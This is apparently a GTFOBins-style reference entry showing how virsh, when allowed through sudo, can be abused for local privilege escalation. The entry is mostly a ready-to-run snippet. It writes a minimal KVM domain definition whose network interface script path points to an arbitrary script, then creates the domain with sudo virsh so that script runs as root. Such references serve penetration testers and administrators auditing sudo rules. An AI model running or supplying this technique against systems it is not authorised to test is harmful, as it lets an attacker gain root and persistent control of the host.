***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * SCRIPT=script_to_run
      TF=$(mktemp)
      cat > $TF << EOF
      <domain type='kvm'>
        <name>x</name>
        <os>
          <type arch='x86_64'>hvm</type>
        </os>
        <memory unit='KiB'>1</memory>
        <devices>
          <interface type='ethernet'>
            <script path='$SCRIPT'/>
          </interface>
        </devices>
      </domain>
      EOF
      sudo virsh -c qemu:///system create $TF
      virsh -c qemu:///system destroy x
